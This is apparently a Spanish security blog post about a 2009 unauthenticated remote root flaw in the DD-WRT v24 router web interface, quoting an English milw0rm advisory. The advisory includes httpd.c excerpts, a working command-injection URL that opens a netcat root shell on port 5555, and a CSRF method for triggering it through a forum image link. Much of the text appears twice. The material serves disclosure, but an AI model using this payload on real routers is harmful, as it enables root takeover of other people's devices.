Se ha descubierto un error de validación de parámetros de entrada en el interfaz web de DD-WRT v,24. Esto podría ser usado por un atacante remoto sin autenticar para eludir restricciones a través de una URL especialmente manipulada. Este error permite ejecutar comandos del sistema con privilegios de "root".
DD-WRT es un firmware no oficial para routers como Linksys, D-Link y La Fonera, entre otros. Está traducido a más de diez idiomas y es compatible con IPv6, soporta WIFI con distintos tipos de cifrado, permite montar VPN y hasta tiene una versión con VoIP, entre otros tantos servicios típicos de un router.
Este fallo se ha publicado en forma de exploit con todo lujo de detalles (incluso existe un vídeo). El exploit permite lanzar una consola por el puerto 5555 del router.
Por suerte, el interfaz solo está habilitado para la red local salvo que se active para acceder a él de forma remota. La vulnerabilidad ha sido reconocida y ya existe un parche para solucionar este fallo.
Más Información:
Web oficial de DD-WRT
http://www.dd-wrt.com/dd-wrtv3/index.php
Descarga del parche
http://www.dd-wrt.com/dd-wrtv2/down.php
This is a remote root vulnerability in DD-WRT's httpd server. The bug exists
at the latest 24 sp1 version of the firmware.
The problem is due to many bugs and bad software design decisions. Here is
part of httpd.c:
859 if (containsstring(file, "cgi-bin")) {
860
861 auth_fail = 0;
862 if (!do_auth
863 (conn_fp, auth_userid, auth_passwd, auth_realm,
864 authorization, auth_check))
865 auth_fail = 1;
......... (snip)............
899
900 }
901 exec = fopen("/tmp/exec.tmp", "wb");
902 fprintf(exec, "export REQUEST_METHOD=\"%s\"\n", method);
903 if (query)
904 fprintf(exec, "/bin/sh %s/%s/tmp/shellout.asp");
........... (snip)..........
926 if (auth_fail == 1) {
927 send_authenticate(auth_realm);
928 auth_fail = 0;
------------
3) issue 3: httpd runs as root :)
Now let's sum up (1), (2) and (3). Any unauthenticated attacker that can
connect to the management web interface can get easily root on the device via
his browser with an URL like:
http://routerIP/cgi-bin/;command_to_execute
There is a catch though: whitespaces break it. Anyway, they can be easily
replaced with shell variable like $IFS. So, getting root shell at 5555/tcp
becomes as easy as typing this in your browser's url bar:
http://routerIP/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh
Voila (pretty old-school, eheh). Here is some (poor) video demonstrating the
problem:
http://www.youtube.com/watch?v=UhDcXCVFrvM
Fortunately, httpd by default does not listen on the outbound interface.
However, this vulnerability can be exploited via a CSRF attack (the dd-wrt
device's owner does not even need to have an authenticated session on the web
UI which is bad, bad). However, a base authentication dialog will appear. In
IE even this can be supressed, see this one:
http://ha.ckers.org/blog/20090630/csrf-and-ignoring-basicdigest-auth/
Unlike the already documented CSRF vulnerability (
http://www.securityfocus.com/bid/32703 ) this DOES NOT need an authenticated
session. This means someone can even post some crafted [img] link on a forum
and a dd-wrt router owner visiting the forum will get owned :)
A weird vulnerability you're unlikely to see in 2009 :) Quite embarrassing I
would say :)
Thanks krassyo at krassyo.info for his support :)
Leka vecher :)
# milw0rm.com [2009-07-20]
DD-WRT es un firmware no oficial para routers como Linksys, D-Link y La Fonera, entre otros. Está traducido a más de diez idiomas y es compatible con IPv6, soporta WIFI con distintos tipos de cifrado, permite montar VPN y hasta tiene una versión con VoIP, entre otros tantos servicios típicos de un router.
Este fallo se ha publicado en forma de exploit con todo lujo de detalles (incluso existe un vídeo). El exploit permite lanzar una consola por el puerto 5555 del router.
Por suerte, el interfaz solo está habilitado para la red local salvo que se active para acceder a él de forma remota. La vulnerabilidad ha sido reconocida y ya existe un parche para solucionar este fallo.
Más Información:
Web oficial de DD-WRT
http://www.dd-wrt.com/dd-wrtv3/index.php
Descarga del parche
http://www.dd-wrt.com/dd-wrtv2/down.php
This is a remote root vulnerability in DD-WRT's httpd server. The bug exists
at the latest 24 sp1 version of the firmware.
The problem is due to many bugs and bad software design decisions. Here is
part of httpd.c:
859 if (containsstring(file, "cgi-bin")) {
860
861 auth_fail = 0;
862 if (!do_auth
863 (conn_fp, auth_userid, auth_passwd, auth_realm,
864 authorization, auth_check))
865 auth_fail = 1;
......... (snip)............
899
900 }
901 exec = fopen("/tmp/exec.tmp", "wb");
902 fprintf(exec, "export REQUEST_METHOD=\"%s\"\n", method);
903 if (query)
904 fprintf(exec, "/bin/sh %s/%s/tmp/shellout.asp");
........... (snip)..........
926 if (auth_fail == 1) {
927 send_authenticate(auth_realm);
928 auth_fail = 0;
------------
3) issue 3: httpd runs as root :)
Now let's sum up (1), (2) and (3). Any unauthenticated attacker that can
connect to the management web interface can get easily root on the device via
his browser with an URL like:
http://routerIP/cgi-bin/;command_to_execute
There is a catch though: whitespaces break it. Anyway, they can be easily
replaced with shell variable like $IFS. So, getting root shell at 5555/tcp
becomes as easy as typing this in your browser's url bar:
http://routerIP/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh
Voila (pretty old-school, eheh). Here is some (poor) video demonstrating the
problem:
http://www.youtube.com/watch?v=UhDcXCVFrvM
Fortunately, httpd by default does not listen on the outbound interface.
However, this vulnerability can be exploited via a CSRF attack (the dd-wrt
device's owner does not even need to have an authenticated session on the web
UI which is bad, bad). However, a base authentication dialog will appear. In
IE even this can be supressed, see this one:
http://ha.ckers.org/blog/20090630/csrf-and-ignoring-basicdigest-auth/
Unlike the already documented CSRF vulnerability (
http://www.securityfocus.com/bid/32703 ) this DOES NOT need an authenticated
session. This means someone can even post some crafted [img] link on a forum
and a dd-wrt router owner visiting the forum will get owned :)
A weird vulnerability you're unlikely to see in 2009 :) Quite embarrassing I
would say :)
Thanks krassyo at krassyo.info for his support :)
Leka vecher :)
# milw0rm.com [2009-07-20]
No hay comentarios.:
Publicar un comentario
Déjanos tu comentario, nos permitirá mejorar.
¿Qué opinas de este tema?
¿Tienes alguna duda o sugerencia?
¿Te parece adecuado y completo este tema?
¿Falta información? ¿Cual?